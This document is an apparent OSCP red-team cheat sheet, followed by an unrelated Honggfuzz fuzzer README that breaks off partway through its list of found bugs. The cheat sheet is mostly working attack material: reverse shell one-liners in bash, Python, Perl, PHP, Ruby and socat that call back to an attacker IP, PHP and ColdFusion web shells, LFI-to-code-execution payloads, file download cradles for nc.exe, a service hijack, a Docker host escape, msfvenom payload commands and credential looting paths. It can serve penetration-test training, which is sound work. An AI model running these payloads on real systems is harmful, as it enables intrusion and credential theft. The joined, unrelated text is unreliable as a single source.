# redteam-notebook Collection of commands, tips and tricks and references I found useful during preparation for OSCP exam. ## Early Enumeration - generic ### Network wide scan - first steps `nmap -sn 10.11.1.0/24` ### netbios scan `nbtscan -r 10.11.1.0/24` ### DNS recon `dnsrecon -r 10.11.1.0/24 -n <DNS IP>` ### Scan specific target with nmap `nmap -sV -sT -p- <target IP> ` ### Guess OS using xprobe2 `xprobe2 <target IP>` ### Check Netbios vulns `nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 target` ### Search for SMB vulns `nmap -p139,445 <target IP> --script smb-vuln*` ### Enumerate using SMB (null session) `enum4linux -a <target IP>` ### Enumerate using SMB (w/user & pass) `enum4linux -a -u <user> -p <passwd> <targetIP>` ## Website Enumeration ### quick enumeration using wordlist `gobuster -u http://<target IP> -w /usr/share/dirb/wordlists/big.txt` ### enumeration and basic vuln scan of a website `nikto -host http://<target IP>` ## Website tips and tricks ### Python * Unsafe YAML parsing may allow creation of Python objects and as a result remote code execution ``` !!python/object/apply:os.system ["bash -i >& /dev/tcp/yourIP/4444 0>&1"] ``` ### PHP * Check for LFI Add `/etc/passwd%00` to any GET/POST arguments. On windows try `C:\Windows\System32\drivers\etc\hosts%00` or `C:\autoexec.bat%00`. A quick win could also be any of these files `c:\sysprep.inf`, `c:\sysprep\sysprep.xml` or `c:\unattend.xml` as they would contain local admin credentials. On linux it's worth checking `/proc/self/environ` to see if there are any credentials passed to the running process via env vars. * Fetching .php files via LFI `/index.php?somevar=php://filter/read=convert.base64-encode/resource=<file path>%00` this will return base64 encoded PHP file. Good for fishing up `config.php` or similar. * Abusing /proc/self/environ LFI to gain reverse shell In some situations it's possible to abuse `/proc/self/environ` to execute a command. For example: `index.php?somevar=/proc/self/environ&cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` * Apache access.log + LFI = PHP injection If Apache logs can be accessed via LFI it may be possible to use it to our advantage by injecting any PHP code in it and then viewing it via LFI. with netcat send a request like this: ``` GET /<?php system($_GET["cmd"]);?> ``` * auth.log + LFI `ssh <?php system($_GET["cmd"]);?>@targetIP` and then LFI `/var/log/auth.log` * /var/mail + LFI `mail -s "<?php system($_GET["cmd"]);?>" someuser@targetIP < /dev/null` * php expect `index.php?somevar=expect://ls` * php input `curl -X POST "targetIP/index.php?somevar=php://input" --data '<?php system("curl -o cmd.php yourIP/cmd.txt");?>'` Then access `targetIP/cmd.php` ### ColdFusion * is it Enterprise or Community? Check how it handles `.jsp` files `curl targetIP/blah/blah.jsp`. If 404 - enterprise, 500 - community. * which version? `/CFIDE/adminapi/base.cfc?wsdl` has a useful comment indicating exact version * common XEE https://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf * LFI in admin login locale `/CFIDE/administrator/enter.cfm?locale=../../../../ColdFusion9\lib\password.properties` - may need full path. They can be obtained with help of `/CFIDE/componentutils/cfexplorer.cfc` * Local upload and execution Once access to admin panel is gained it's possible to use the task scheduler to download a file and use a system probe to execute it. `Debugging & Logging` -> `Scheduled Tasks` -> url=<path to our executable>, Publish - save output to file (some writable path). Then manually execute this task which will download and save our file. To execute it create a probe `Debugging & Logging` -> `System probes` -> URL=<some URL>, Probe fail - fail if probe does not contain "blahblah", Execute program <path to our downloaded exe>. And then run probe manually. * Files worth grabbing * CF7 \lib\neo-query.xml * CF8 \lib\neo-datasource.xml * CF9 \lib\neo-datasource.xml * Simple remote CFM shell ``` <html> <body> <cfexecute name = "#URL.runme#" arguments = "#URL.args#" timeout = "20"> </cfexecute> </body> </html> ``` * Simple remote shell using Java (if CFEXECUTE is disabled) ``` <cfset runtime = createObject("java", "java.lang.System")> <cfset props = runtime.getProperties()> <cfdump var="#props#"> <cfset env = runtime.getenv()> <cfdump var="#env#"> ``` ### dir busting * generic dirbusting `gobuster -u targetIP -w /usr/share/dirb/wordlists/big.txt` * fuzz some cgi `gobuster -u targetIP -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s 200` ## Reverse Shell Howto * Bash `bash -i >& /dev/tcp/yourIP/4444 0>&1` * Perl Linux `perl -e 'use Socket;$i="yourIP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'` * Perl Windows `perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"yourIP:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'` * Python `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("yourIP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` * PHP `php -r '$sock=fsockopen("yourIP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'` * Ruby `ruby -rsocket -e'f=TCPSocket.open("yourIP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'` * Java (Linux) ``` r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/yourIP/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` * Groovy ``` String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()){while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Thread.sleep(50); try {p.exitValue(); break; }catch (Exception e){}}; p.destroy(); s.close(); ``` * xterm `xterm -display yourIP:1` And on your side authorize the connection with `xhost +targetIp` and catch it with `Xnest :1` * socat Listener: ```socat file:`tty`,raw,echo=0 yourIP:4444``` target: `socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:yourIP:4444` ## Interactive Shell Upgrade Tricks * Python (Linux) `python -c 'import pty; pty.spawn("/bin/bash")' ` Then Ctrl-Z back to local shell and `stty raw -echo`, then back to remote shell with `fg` and set terminal with `export TERM=xterm`. * Python (Windows) `c:\python26\python.exe -c 'import pty; pty.spawn("c:\\windows\\system32\\cmd.exe")' ` * Expect sh.exp ``` #!/usr/bin/expect spawn sh interact ``` * Script `script /dev/null` ## Inside Windows * Get version `systeminfo | findstr /B /C:"OS Name" /C:"OS Version"` * Get users `net users` * Get user info `net user <username>` * Check local connections and listening ports (compare with nmap scan to see if there are any hidden ports) `netstat -ano` * Firewall status `netsh firewall show state` `netsh firewall show config` * Scheduled tasks List - `schtasks /query /fo LIST /v` Create - `schtasks /Create /TN mytask /SC MINUTE /MO 1 /TR "mycommands"` Run - `schtasks /Run /TN mytask` Delete - `schtasks /Delete /TN mytask` * Running tasks List - `tasklist /SVC` Kill - `taskkill /IM <exe name> /F` Kill - `taskkill /PID <pid> /F` * Services List - `net start` Long name to key name `sc getkeyname "long name"` Details - `sc qc <key name>` Config - `sc config <key name> ` * Low hanging fruits to grab ``` c:\sysprep.inf c:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml ``` * Installers are running as elevated? `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` * Find interesting files `dir /s *pass* == *cred* == *vnc* == *.config*` `findstr /si password *.xml *.ini *.txt` * Find interesting registry entries `reg query HKLM /f password /t REG_SZ /s` `reg query HKCU /f password /t REG_SZ /s` * Permissions Check detail on service - `accesschk.exe /accepteula -ucqv <service name>` Find modifiable services - `accesschk.exe /accepteula -uwcqv "Authenticated Users" *` `accesschk.exe /accepteula -uwcqv "Users" *` Folder permissions - `accesschk.exe -dqv <path>` `cacls <path>` `icacls <path\file` * Qick win on WinXP SP0/1 `sc config upnphost binpath= "C:\nc.exe -nv yourIP 4444 -e C:\WINDOWS\System32\cmd.exe"` `sc config upnphost obj= ".\LocalSystem" password= ""` `sc config upnphost depend= ""` `net stop upnphost` `net start upnphost` * Quick wins `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"` `reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"` `reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"` `reg query "HKCU\Software\ORL\WinVNC3\Password"` * Download file with VBS ``` dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", "http://yourIp/nc.exe", False xHttp.Send with bStrm .type = 1 \'//binary .open .write xHttp.responseBody .savetofile "C:\\Users\\Public\\nc.exe", 2 \'//overwrite end with ``` * Download with Powershell 3+ `powershell -NoLogo -Command "Invoke-WebRequest -Uri 'https://yourIP/nc.exe' -OutFile 'c:\Users\Public\Downloads\nc.exe'"` * Download with Powershell 2 `powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('https://yourIP/nc.exe', 'c:\Users\Public\Download\nc.exe')"` * Download with Python `c:\Python26\python.exe -c "import urllib; a=open('nc.exe', 'wb'); a.write(urllib.urlopen('http://yourIP/nc.exe').read()); a.flush();a.close()" ` * Windows specific LPE vulns - https://www.exploit-db.com/exploits/11199/ - https://www.exploit-db.com/exploits/18176/ - https://www.exploit-db.com/exploits/15609/ - https://www.securityfocus.com/bid/42269/exploit - https://www.securityfocus.com/bid/46136/exploit ## Inside Linux * Basic enumeration System info `uname -a` Arch `uname -m` Kernel `cat /proc/version ` Distro `cat /etc/*-release` or `cat /etc/issue` Filesystem `df -a ` Users `cat /etc/passwd` Groups `cat /etc/group` Super accounts `grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'` Currently logged in `finger`, `w`, `who -a`, `pinky`, `users` Last logged users `last`, `lastlog` Cheeky test - `sudo -l` Anything interesting we can run as sudo? `sudo -l 2>/dev/null | grep -w 'nmap|perl|awk|find|bash|sh|man|more|less|vi|vim|nc|netcat|python|ruby|lua|irb' | xargs -r ls -la 2>/dev/null` History - `history` Env vars `env` Available shells `cat /etc/shells ` SUID files `find / -perm -4000 -type f 2>/dev/null` SUID owned by root `find / -uid 0 -perm -4000 -type f 2>/dev/null` GUID files `find / -perm -2000 -type f 2>/dev/null ` World writable `find / -perm -2 -type f 2>/dev/null` World writable executed `find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null ` World writable dirs `find / -perm -2 -type d 2>/dev/null` rhost files `find /home –name *.rhosts -print 2>/dev/null ` Plan files `find /home -iname *.plan -exec ls -la {} ; -exec cat {} 2>/dev/null ; ` hosts.equiv `find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ; ` Can we peek at /root? `ls -ahlR /root/ ` Find ssh files `find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la` Inetd `ls -la /usr/sbin/in.* ` Grep logs for loot `grep -l -i pass /var/log/*.log 2>/dev/null ` What do we have in logs `find /var/log -type f -exec ls -la {} ; 2>/dev/null ` Find conf files in /etc `find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} ; 2>/dev/null ` as above `ls -la /etc/*.conf ` List open files `lsof -i -n ` Can we read root mail? `head /var/mail/root ` What is running as root? `ps aux | grep root ` Lookup paths to running files `ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'` Exports and permissions of NFS `ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null ` List sched jobs `ls -la /etc/cron* ` List open connections (run with sudo/as root for more results) `lsof -i` Installed pkgs: `dpkg -l` (debian), `rpm -qa` (RH) sudo version? `sudo -V` Available compilers `dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null` If you find a privileged bash shell which uses wildcard when iterating over files on folder you can create files in note that you can create files which names will be parsed as arguments to the command that is used to iterate over said files. This opens up interesting attack vector, ie when there's a for loop and inside the loop script executes for example `cp` on each file. If you create file with `touch -- '--someargument'` it will be passed to the command as `--someargument`. Good example is if such script copies files somewhere. Adding a file named `--preserve=mode` and also copying `/bin/bash` in same folder and changing its mode to `4755` will result the script copying bash as a root with suid permissions. Executing that copy of bash with `bash -p` will result in bash running as root. ### Docker tips Since most likely Docker runs as root if you can execute docker commands as unpriviledged user you can very likely use Docker's privs instead. `docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash` - note that the root folder from host is mounted as `/host`. You'll also see all processes running on host and be connected to same NICs. You may want to look into escaping UTS and IPC namespacing with `--uts=host --ipc=host` ### Upload files using cUrl with WebDAV ``` curl -T nc.exe http://targetIP/nc.txt curl -X MOVE -v -H "Destination:http://targetIP/nc.exe" http://targetIP/nc.txt ``` ## msfvenom ### List payloads msfvenom -l ### Binaries * Linux `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf` * Windows `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe` * Mac `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho` ### Web Payloads * PHP `msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php` `cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php` * ASP `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp` * JSP `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp` * WAR `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war` ### Scripting Payloads * Python `msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py` * Bash `msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh` * Perl `msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl` ### Shellcode For all shellcode see `msfvenom –help-formats` for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. * Linux Based Shellcode `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` * Windows Based Shellcode `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` * Mac Based Shellcode `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` ## Shellshock * CVE-2014-6271 `env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id` * CVE-2014-7169 `env X='() { (a)=>\' bash -c "echo date"; cat echo` * CVE-2014-7186 `bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"` * CVE-2014-7187 `(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"` * CVE-2014-6278 `env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :` ## References * [OSCP Exam Guide](https://support.offensive-security.com/#!oscp-exam-guide.md) - MUST read! * [The Magic of Learning](http://bitvijays.github.io/) - a real treasure trove! * [FuzzySecurity](http://www.fuzzysecurity.com) - this is something you must bookmark... period. I found the [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) especially useful. * [WMIC reference/guide](https://www.computerhope.com/wmic.htm) * [SysInternals](https://docs.microsoft.com/en-us/sysinternals/) - this is a must have for working on Windows boxes. * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) * [Elevating privileges by exploiting weak folder permissions](http://www.greyhathacker.net/?p=738) * [ColdFusion for PenTesters](http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf) * [ColdFusion Path Traversal](http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/) * [Penetration Testing Tools Cheat Sheet](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/) - Good read. Check out other cheat sheets on this page too! * [fimap](https://github.com/kurobeats/fimap) - LFI/RFI scanner * [Changeme](https://github.com/ztgrace/changeme) - default password scanner * [CIRT Default Passwords DB](https://cirt.net/passwords) * [From LFI to Shell](http://resources.infosecinstitute.com/local-file-inclusion-code-execution) * [Useful Linux commands](https://highon.coffee/blog/linux-commands-cheat-sheet/) * [Local Linux Enumeration](https://www.rebootuser.com/?p=1623) * [Creating Metasploid Payloads](https://netsec.ws/?p=331) * [Shellshock PoCs](https://github.com/mubix/shellshocker-pocs) * [GTFOBins](https://gtfobins.github.io/#) * [BustaKube](https://www.bustakube.com/)
# Honggfuzz ## Description A security oriented, feedback-driven, evolutionary, easy-to-use fuzzer with interesting analysis options. See the [Usage document](https://github.com/google/honggfuzz/blob/master/docs/USAGE.md) for a primer on Honggfuzz use. ## Code * Latest stable version: [2.5](https://github.com/google/honggfuzz/releases) * [Changelog](https://github.com/google/honggfuzz/blob/master/CHANGELOG) ## Installation ``` sudo apt-get install binutils-dev libunwind-dev libblocksruntime-dev clang make ``` ## Features * It's __multi-process__ and __multi-threaded__: there's no need to run multiple copies of your fuzzer, as honggfuzz can unlock potential of all your available CPU cores with a single running instance. The file corpus is automatically shared and improved between all fuzzed processes. * It's blazingly fast when the [persistent fuzzing mode](https://github.com/google/honggfuzz/blob/master/docs/PersistentFuzzing.md) is used. A simple/empty _LLVMFuzzerTestOneInput_ function can be tested with __up to 1mo iterations per second__ on a relatively modern CPU (e.g. i7-6700K). * Has a [solid track record](#trophies) of uncovered security bugs: the __only__ (to the date) __vulnerability in OpenSSL with the [critical](https://www.openssl.org/news/secadv/20160926.txt) score mark__ was discovered by honggfuzz. See the [Trophies](#trophies) paragraph for the summary of findings to the date. * Uses low-level interfaces to monitor processes (e.g. _ptrace_ under Linux and NetBSD). As opposed to other fuzzers, it __will discover and report hijacked/ignored signals from crashes__ (intercepted and potentially hidden by a fuzzed program). * Easy-to-use, feed it a simple corpus directory (can even be empty for the [feedback-driven fuzzing](https://github.com/google/honggfuzz/blob/master/docs/FeedbackDrivenFuzzing.md)), and it will work its way up, expanding it by utilizing feedback-based coverage metrics. * Supports several (more than any other coverage-based feedback-driven fuzzer) hardware-based (CPU: branch/instruction counting, __Intel BTS__, __Intel PT__) and software-based [feedback-driven fuzzing](https://github.com/google/honggfuzz/blob/master/docs/FeedbackDrivenFuzzing.md) modes. Also, see the new __[qemu mode](https://github.com/google/honggfuzz/tree/master/qemu_mode)__ for blackbox binary fuzzing. * Works (at least) under GNU/Linux, FreeBSD, NetBSD, Mac OS X, Windows/CygWin and [Android](https://github.com/google/honggfuzz/blob/master/docs/Android.md). * Supports the __persistent fuzzing mode__ (long-lived process calling a fuzzed API repeatedly). More on that can be found [here](https://github.com/google/honggfuzz/blob/master/docs/PersistentFuzzing.md). * It comes with the __[examples](https://github.com/google/honggfuzz/tree/master/examples) directory__, consisting of real world fuzz setups for widely-used software (e.g. Apache HTTPS, OpenSSL, libjpeg etc.). * Provides a __[corpus minimization](https://github.com/google/honggfuzz/blob/master/docs/USAGE.md#corpus-minimization--m)__ mode. --- <p align="center"> <img src="https://raw.githubusercontent.com/google/honggfuzz/master/screenshot-honggfuzz-1.png" width="75%" height="75%"> </p> --- ## Requirements * **Linux** - The BFD library (libbfd-dev) and libunwind (libunwind-dev/libunwind8-dev), clang-5.0 or higher for software-based coverage modes * **FreeBSD** - gmake, clang-5.0 or newer * **NetBSD** - gmake, clang, capstone, libBlocksRuntime * **Android** - Android SDK/NDK. Also see [this detailed doc](https://github.com/google/honggfuzz/blob/master/docs/Android.md) on how to build and run it * **Windows** - CygWin * **Darwin/OS X** - Xcode 10.8+ * if **Clang/LLVM** is used to compile honggfuzz - link it with the BlocksRuntime Library (libblocksruntime-dev) ## Trophies Honggfuzz has been used to find a few interesting security problems in major software packages; An incomplete list: * Dozens of security problems via the [OSS-Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/list?q=honggfuzz&can=1) project * [Pre-auth remote crash in __OpenSSH__](https://anongit.mindrot.org/openssh.git/commit/?id=28652bca29046f62c7045e933e6b931de1d16737) * __Apache HTTPD__ * [Remote crash in __mod\_http2__ • CVE-2017-7659](http://seclists.org/oss-sec/2017/q2/504) * [Use-after-free in __mod\_http2__ • CVE-2017-9789](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9789) * [Memory leak in __mod\_auth\_digest__ • CVE-2017-9788](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9788) * [Out of bound access • CVE-2018-1301](http://seclists.org/oss-sec/2018/q1/265) * [Write after free in HTTP/2 • CVE-2018-1302](http://seclists.org/oss-sec/2018/q1/268) * [Out of bound read • CVE-2018-1303](http://seclists.org/oss-sec/2018/q1/266) * Various __SSL__ libs * [Remote OOB read in __OpenSSL__ • CVE-2015-1789]( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1789) * [Remote Use-after-Free (potential RCE, rated as __critical__) in __OpenSSL__ • CVE-2016-6309](https://www.openssl.org/news/secadv/20160926.txt) * [Remote OOB write in __OpenSSL__ • CVE-2016-7054](https://www.openssl.org/news/secadv/20161110.txt) * [Remote OOB read in __OpenSSL__ • CVE-2017-3731](https://www.openssl.org/news/secadv/20170126.txt) * [Uninitialized mem use in __OpenSSL__](https://github.com/openssl/openssl/commit/bd5d27c1c6d3f83464ddf5124f18a2cac2cbb37f) * [Crash in __LibreSSL__](https://github.com/openbsd/src/commit/c80d04452814d5b0e397817ce4ed34edb4eb520d) * [Invalid free in __LibreSSL__](https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.6.2-relnotes.txt) * [Uninitialized mem use in __BoringSSL__](https://github.com/boringssl/boringssl/commit/7dccc71e08105b100c3acd56fa5f6fc1ba9b71d3) * [Adobe __Flash__ memory corruption • CVE-2015-0316](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0316) * [Multiple bugs in the __libtiff__ library](http://bugzilla.maptools.org/buglist.cgi?query_format=advanced;emailreporter1=1;email1=robert@swiecki.net;product=libtiff;emailtype1=substring) * [Multiple bugs in the __librsvg__ library](https://bugzilla.gnome.org/buglist.cgi?query_format=advanced;emailreporter1=1;email1=robert%40swiecki.net;product=librsvg;emailtype1=substring) * [Multiple bugs in the __poppler__ library](http://lists.freedesktop.org/archives/poppler/2010-November/006726.html) * [Multiple exploitable bugs in __IDA-Pro__](https://www.hex-rays.com/bugbounty.shtml) * [Remote DoS in __Crypto++__ • CVE-2016-9939](http://www.openwall.com/lists/oss-security/2016/12/12/7) * Programming language interpreters * [__PHP/Python/Ruby__](https://github.com/dyjakan/interpreter-bugs) * [PHP WDDX](https://bugs.php.net/bug.php?id=74145) * [PHP](https://bugs.php.net/bug.php?id=74194) * Perl: [#1](https://www.nntp.perl.org/group/perl.perl5.porters/2018/03/msg250072.html), [#2](https://github.com/Perl/perl5/issues/16468), [#3](https://github.com/Perl/perl5/issues/16015) * [Double-free in __LibXMP__](https://github.com/cmatsuoka/libxmp/commit/bd1eb5cfcd802820073504c234c3f735e96c3355) * [Heap buffer overflow in SAPCAR • CVE-2017-8852](https://www.coresecurity.com/blog/sapcar-heap-buffer-overflow-crash-exploit) * [Crashes in __libbass__](http://seclists.org/oss-sec/2017/q4/185) * __FreeType 2__: * [CVE-2010-2497](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2497) * [CVE-2010-2498](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2498) * [CVE-2010-2499](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2499) * [CVE-2010-2500](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2500) * [CVE-2010-2519](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2519) * [CVE-2010-2520](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2520) * [CVE-2010-2527](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2527) * Stack corruption issues in the Windows OpenType parser: [#1](https://github.com/xinali/AfdkoFuzz/blob/4eadcb19eacb2fb73e4b0f0b34f382a9331bb3b4/CrashesAnalysis/CrashesAnalysis_3/README.md), [#2](https://github.com/xinali/AfdkoFuzz/blob/master/CVE-2019-1117/README.md), [#3](https://github.com/xinali/AfdkoFuzz/tree/f6d6562dd19403cc5a1f8cef603ee69425b68b20/CVE-2019-1118) * [Infinite loop in __NGINX Unit__](https://github.com/nginx/unit/commit/477e8177b70acb694759e62d830b8a311a736324) * A couple of problems in the [__MATLAB MAT File I/O Library__](https://sourceforge.net/projects/matio): [#1](https://github.com/tbeu/matio/commit/406438f497931f45fb3edf6de17d3a59a922c257), [#2](https://github.com/tbeu/matio/commit/406438f497931f45fb3edf6de17d3a59a922c257), [#3](https://github.com/tbeu/matio/commit/a55b9c2c01582b712d5a643699a13b5c41687db1), [#4](https://github.com/tbeu/matio/commit/3e6283f37652e29e457ab9467f7738a562594b6b), [#5](https://github.com/tbeu/matio/commit/783ee496a6914df68e77e6019054ad91e8ed6420) * [__NASM__](https://github.com/netwide-assembler/nasm) [#1](https://bugzilla.nasm.us/show_bug.cgi?id=3392501), [#2](https://bugzilla.nasm.us/show_bug.cgi?id=3392750), [#3](https://bugzilla.nasm.us/show_bug.cgi?id=3392751), [#4](https://bugzilla.nasm.us/show_bug.cgi?id=3392760), [#5](https://bugzilla.nasm.us/show_bug.cgi?id=3392761), [#6](https://bugzilla.nasm.us/show_bug.cgi?id=3392762), [#7](https://bugzilla.nasm.us/show_bug.cgi?id=3392792), [#8](https://bugzilla.nasm.us/show_bug.cgi?id=3392793), [#9](https://bugzilla.nasm.us/show_bug.cgi?id=3392795), [#10](https://bugzilla.nasm.us/show_bug.cgi?id=3392796) * __Samba__ [tdbdump + tdbtool](http://seclists.org/oss-sec/2018/q2/206), [#2](https://github.com/samba-team/samba/commit/183da1f9fda6f58cdff5cefad133a86462d5942a), [#3](https://github.com/samba-team/samba/commit/33e9021cbee4c17ee2f11d02b99902a742d77293), [#4](https://github.com/samba-team/samba/commit/ac1be895d2501dc79dcff2c1e03549fe5b5a930c), [#5](https://github.com/samba-team/samba/commit/b1eda993b658590ebb0a8225e448ce399946ed83), [#6](https://github.com/samba-team/samba/commit/f7f92803f600f8d302cdbb668c42ca8b186a797f) [CVE-2019-14907](https://www.samba.org/samba/security/CVE-2019-14907.html) [CVE-2020-10745](https://www.samba.org/samba/security/CVE-2020-10745.html) [CVE-2021-20277](https://www.samba.org/samba/security/CVE-2021-20277.html) [LPRng_time](https://github.com/smokey57/samba/commit/fc267567a072c9483bbcc5cc18e150244bc5376b) * [Crash in __djvulibre__](https://github.com/barak/djvulibre/commit/89d71b01d606e57ecec2c2930c145bb20ba5bbe3) * [Multiple crashes in __VLC__](https://www.pentestpartners.com/security-blog/double-free-rce-in-vlc-a-honggfuzz-how-to/) * [Buffer overflow in __ClassiCube__](https://github.com/UnknownShadow200/ClassiCube/issues/591) * [Heap buffer-overflow (or UAF) in __MPV__](https://github.com/mpv-player/mpv/issues/6808) * [Heap buffer-overflow in __picoc__](https://gitlab.com/zsaleeba/picoc/issues/44) * Crashes in __OpenCOBOL__: [#1](https://sourceforge.net/p/open-cobol/bugs/586/), [#2](https://sourceforge.net/p/open-cobol/bugs/587/) * DoS in __ProFTPD__: [#1](https://twitter.com/SecReLabs/status/1186548245553483783) • [#2](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18217) * [Multiple security problems in ImageIO (iOS/MacOS)](https://googleprojectzero.blogspot.com/2020/04/fuzzing-imageio.html) * [Memory corruption in __htmldoc__](https://github.com/michaelrsweet/htmldoc/issues/370) * [Memory corruption in __OpenDetex__](https://github.com/pkubowicz/opendetex/issues/60) * [Memory corruption in __Yabasic__](https://github.com/marcIhm/yabasic/issues/36) * [Memory corruption in __Xfig__](https://sourceforge.net/p/mcj/tickets/67/) * [Memory corruption in __LibreOffice__](https://github.com/LibreOffice/core/commit/0754e581b0d8569dd08cf26f88678754f249face) * [Memory corruption in __ATasm__](https://sourceforge.net/p/atasm/bugs/8/) * [Memory corruption in __oocborrt__](https://warcollar.com/cve-2020-24753.html) • [CVE-2020-24753](https://nvd.nist.gov/vuln/detail/CVE-2020-24753) * [Memory corruption in __LibRaw__](https://github.com/LibRaw/LibRaw/issues/309) * [NULL-ptr deref in __peg-markdown__](https://github.com/jgm/peg-markdown/issues/43) * [Uninitialized value in __MD4C__](https://github.com/mity/md4c/issues/130) • [CVE-2020-26148](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26148) * [17 new bugs in __fwupd__](https://github.com/google/oss-fuzz/pull/4823#issue-537143670) * [Assertion in 